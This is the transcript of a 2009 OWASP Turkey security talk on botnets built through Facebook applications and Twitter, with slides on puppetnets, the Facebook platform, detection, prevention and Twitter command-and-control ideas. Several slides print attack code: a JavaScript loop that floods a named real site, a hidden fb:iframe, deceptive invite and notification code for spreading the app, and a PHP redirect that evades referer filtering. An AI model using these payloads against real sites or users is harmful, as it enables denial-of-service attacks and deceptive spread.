Transcript Facebook, Twitter and Botnets OWASP Turkey Chapter September 26 2009 Istanbul Botnet • Collection of software robots, or bots, that run autonomously and automatically • Botnet.

Facebook, Twitter and Botnets
OWASP Turkey Chapter
September 26 2009
Istanbul
Botnet
• Collection of software robots, or bots, that run
autonomously and automatically
• Botnet in its simplest form is an army of
compromised computers that take orders from a
botherder
• Botnets are arguably the biggest threat that the
Internet community has faced
• Most popular Botnet Type: “IRC Channels based
Botnets”
• Lately Social Networking Sites based Botnets
Puppetnet
• Puppetnets rely on websites that coerce web browsers to
participate in Malicious activities
• Such activities include
– distributed denial-of-service
– worm propagation
– reconnaissance probing
• Puppetnets exploit the high degree of flexibility granted to
the mechanisms comprising the web architecture
• A website under the control of an attacker can thereby
transform a collection of web browsers into a distributed
system that is effectively controlled by the attacker
• Puppetnets can instruct any web browser to engage in
malicious activities
Puppetnet
• Participation in puppetnets is dynamic
• Users join and participate unknowingly while surfing
the net
• Easy to maintain a reasonable population, without the
burden of having to look for new victims
• Harder for the defenders to track and filter out attacks,
as puppets are likely to be relatively short-lived
• Only indirectly misuse browsers to attack third parties
• http://www.ics.forth.gr/dcs/Activities/papers/TISSEC.p
uppetnets.2007.pdf
Puppetnet Diagram
Zararli Web Sunucusu
Atak komutlarini da
iceren HTTP istek ve
cevaplari
Atak Trafigi
Kurban Site
Web Istemcileri
What can be done via Puppetnets
•
•
•
•
Image Reference
Loading image objects through Javascript
Open up pop-up Windows
Creation of Frames to load remote objects
* No browser that imposes restrictions on the location or type of the
target referenced through these mechanisms
Puppetnet DDoS
Firepower of
DDoS Attack
=
Number of users
concurrently
viewing the
malicious page on
their web browser
*
Amount of bandwidth
each of these users can
generate towards the
target server
• What is more important?
– Size of Puppetnet ?
– Sufficient Firepower for a typical DDoS scenario?
• Determine how much “traffic” a browser can
typically generate under the attacker’s command
Facebook
• Facebook is a global social networking website
that is operated and privately owned by
Facebook, Inc.
• Users can
– add friends
– send them messages
– update their personal profiles to notify friends about
themselves
– join networks organized by city, workplace, school,
and region
Application Development in Facebook
• Options while creating FaceBook applications
• Option1:
Port an existing application to FaceBook by using iframe
• Option2:
Develop an application by using FBML, FBJS, FQL and FB API
• Create an application in FaceBook
•
•
•
•
FaceBook API
Facebook Markup Language(FBML)
Facebook Query Language(FQL)
Facebook Javascript(FBJS)
Facebook Application (How does it work?)
– Callback metaphor to interact with applications
– The URL of the application associated with a
registered application in Facebook
– When the Facebook application URL requested,
Facebook redirects the request to the server
– The application processes the request, communicates
with Facebook using the Facebook Application
Programming Interface (API) or Facebook Query
Language (FQL)
– Returns Facebook Markup Language (FBML) to
Facebook for presentation
Facebook Dynamics
• FaceBook API
– Web services programming interface for accessing core services
•
•
•
•
•
profile
friends
group
event
photo
– Performs other Facebook-centric functionality
• log in
• redirect
• update view
• Facebook Markup Language (FBML)
– HTML-like language
– Display pages inside of the Facebook canvas
Facebook Dynamics
• Facebook Query Language (FQL)
– SQL-based interface into Facebook data.
– Similar to standard SQL
– Access many Facebook database tables
•
•
•
•
•
•
•
•
•
user
friend
group
group_member
event
event_member
photo
album
photo_tag
– Restrictions
• SELECT statements must be performed one table at a time
• Join queries are not permitted
• Queries must be indexable.
Facebook Dynamics
•
Facebook Javascript (FBJS)
–
–
–
–
Allows limited scripting functionality
Alternative DOM implementation
Similar to Standard JavaScript
Differs from standard JavaScript
• While accessing a JavaScript property (such as document.href), FBJS
uses a pair of get and set methods instead (getHref, setHref)
• While processing scripting code inside of script elements, tacks on the
application ID to function and variable names
• Prevents the ability to run any javascript code you want
• FBJS transformed on the fly into JavaScript as the page is loaded
• All variables and functions are prepended with a string like
"xyz3455679_“
• Restriction on what can be done with DOM elements
• Avoids cross-site-scripting attacks and hostile user behavior
Facebook Platform
• Standards-based programming framework
– Enables developers to create applications that
interact and integrate with core Facebook services
– Facebook applications are not installed directly
onto the Facebook server. Instead, they are placed
on the developer’s server
– Facebook applications are called by Facebook
when the application URL is requested
Facebook Application Diagram (How does it work?)
1. Facebook Sunucusu uygulama icin bir URL
istegi aliyor (apps.facebook.com/uygulama)
4. Facebook FBML cevabini aliyor ve
cevabi Facebook Canvas icerisinde
gosteriyor ve HTML yi istegi baslatan
tarayiciya gonderiyor.
2. Facebook Uygulamanin oldugu
Sunucudaki Callback URL yi cagiriyor
3. Uygulama istegi degerlendiriyor,
Facebook bilgisini API ya da FQL vasitasi ile
Facebook’dan aliyor ve FBML araciligi ile
kullanicinin gormesi icin FBML araciligi ile
Facebook’a geri gonderiyor.
What kind of a Facebook Application?
•
•
•
•
•
•
•
A simple application?
A popular application?
Game or Utility?
Fan based Program?
Continuous Usage?
A program that creates Programs?
TOS?
Facebook-TOS
• http://www.facebook.com/terms.php
–
–
–
–
–
–
–
–
–
Privacy
Sharing Your Content and Information
Safety
Registration and Account Security
Protecting Other People's Rights
Mobile
Payments
Special Provisions Applicable to Share Links
Special Provisions Applicable to Developers/Operators of Applications
and Websites
– About Advertisements on Facebook
– Special Provisions Applicable to Advertisers
– Special Provisions Applicable to Pages
Facebook - TOS - Safety
• Safety
• You will not upload viruses or other malicious code.
• You will not collect users' content or information, or
otherwise access Facebook, using automated means (such
as harvesting bots, robots, spiders, or scrapers) without
our permission.
• You will not use Facebook to do anything unlawful,
misleading, malicious, or discriminatory.
• You will not do anything that could disable, overburden, or
impair the proper working of Facebook, such as a denial of
service attack.
Facebook - TOS - Provisions Applicable
to Developers
• Special Provisions Applicable to
Developers/Operators of Applications and
Websites
– You will only request data you need to operate your
application.
– You will not use, display, or share a user's data in a
manner inconsistent with the user's privacy settings.
– You will delete all data you received from Facebook if
we disable your application or ask you to do so.
Facebook Revocation Email
Botnet Creation in Facebook
• Image Reference
– Inline linking
• Use of a linked object (usually an image)
• Using it from one site into a web page belonging to a second site
• The second site is said to have an inline link to the site where the
object is located
• When a web site is visited
– Browser first downloads the textual content in the form of an HTML
document
– The downloaded HTML document may call for other HTML files to be
processed
– It also permits absolute URLs that refer to images hosted on other servers
(<img src="http://www.example.com/picture.jpg" />)
– When a browser downloads an HTML page containing such an image, the
browser will contact the remote server to request the image content
Botnet Creation in Facebook
• Image Reference
– A single line like
• echo "<fb:iframe frameborder=\"0\" width:0px height:0px
src=\"http://www.w3schools.com/js/venus.jpg\" />";
– Good enough to create a DDOS Attack to the src
Victim Site being w3schools.com in the above
example
– An iframe which downloads an image with a width
and height set to 0px
– Browser fetches the page above and does not show it
– Change width and height and see the picture
Botnet Creation in Facebook
•
•
How to Create a large number of requests to the target site ?
–
Embed a sequence of image references in the malicious webpage, which can be done using either a
sequence of IMG SRC instructions
–
JavaScript loop that instructs the browser to load objects from the target server
Loading image objects through Javascript
<SCRIPT>
pic= new Image(10,10);
function DDOS() {
var now = new Date();
pic.src='http://www.w3schools.com/js?'+now.getTime();
setTimeout ( "DDOS()", 10 );
return;
}
</SCRIPT>
<IFRAME name='parent' width="0%" src="page.htm" onLoad="DDOS()">
</IFRAME>
Propagation of Facebook Botnet
• Create an Application
• Make it nice and fun !(Really important)
• Advertise it by using Facebook features:
– News Feed
– Invitation(Limit 20 a day)
$invite_text = htmlentities($invite_text);
echo "<fb:request-form type='Kim Silmis' content='$invite_text' action='index.php' method='POST'
invite='true' >";
echo "<fb:multi-friend-selector showborder='true' max ='20' actiontext='Kim Silmiş programı ile sizi
arkadaş listesinden silenleri görmek ister misiniz?' exclude_ids='$exclude_list' >";
echo "</fb:request-form>";
– Notification
$facebook->api_client->notifications_send($friends[1], 'Kim silmis kullaniyor. Siz de <a
href="http://apps.facebooks.com/kilsilmis">Kim silmis</a> kullanarak zevkle zaman geçirebilirsiniz. ');
Detection of Facebook Botnet
• Victim host must filter out all incoming traffic introduced by
Facebook users.
– Use the referer field of the HTTP requests
– Determine whether a request originates from facebook.com or not
– Stop the attack traffic accordingly
• Possible for a Facebook application developer to overcome this
situation
src=http://attack-host/dummy-page?ref=victim-host/image1.jpg
<?php
if ($_GET["ref"]) { $ref=$_GET["ref"]; }
print("<meta http-equiv=’refresh’
content=’0; url=$ref’>");
?>
Prevention of Facebook Botnet
• Social network providers should be careful with the use
of client side technologies, like JavaScript, etc.
• Social network operator should provide developers
with a strict API, which is capable of giving access to
resources only related to the system.
• Applications should run in an isolated environment
imposing constraints to prevent the application from
interacting with other Internet hosts
• Facebook Platform can cancel the use of fb:iframe tag,
as this tag is used to load images hosted at the victim
host.
Facebook PoC Facebot
• www.ics.forth.gr/dcs/Activities/papers/facebo
t.isc08.pdf
Twitter
• Free social networking and micro-blogging
service
• Enables users to send and read messages known
as tweets
• Tweets are text-based posts of up to
140 characters displayed on the author's profile
page and delivered to the author's followers
• Senders can restrict delivery to those in their
circle of friends or allow open access
Twitter
•
•
•
•
•
•
•
•
•
Profile(Name, Location, Bio)
Find People(Twitter, Other Networks, Emails, Suggested Users)
@
RT
Direct Message
#
http://search.twitter.com
Favorites
RSS
Twitter Botnet?
•
Reasons
– Ability to hide random commands in the large amount of data that is generated each day
– A really good API that would make integration easy
•
Ideas
– Option1: A protected twitter account that only the bots could read.
•
•
•
Restriction on who could see the commands ?
Easy for Twitter to block the user
PoC supposedly exists
– Option2: Send Commands to random accounts and then have the Bot use the search feature
to find the commands.
–
–
–
–
–
•
Harder for Twitter to block the messages as the commands could be posted from any account to any other account.
Bot would have to have a way to spot the commands in the general mess of other tweets out there.
If the bot can spot the commands then Twitter could also do the same matching and automatically drop those tweets.
Use seemingly innocent commands, such as "check out this link ..." instead of saying download a file
Innocent commands would be hard for Twitter to block without upsetting legitimate users
Additional Suggestions
– Using TinyURL to obfuscate commands
– Using hash tags to represent certain things
– Making bots to follow certain accounts to mark themselves as bots.
Twitter - POC
• Proof of Concept bot which uses Twitter as its
Command and Control channel at
http://www.digininja.org/projects/kreiosc2.php
• Waiting for Defcon 2009 Video Presented by
Kevin Johnson and Tom Eston
Tesekkurler
• Ibrahim Halil Saruhan
Facebook
: [email protected]
E-Mail
: [email protected]
Sorular
?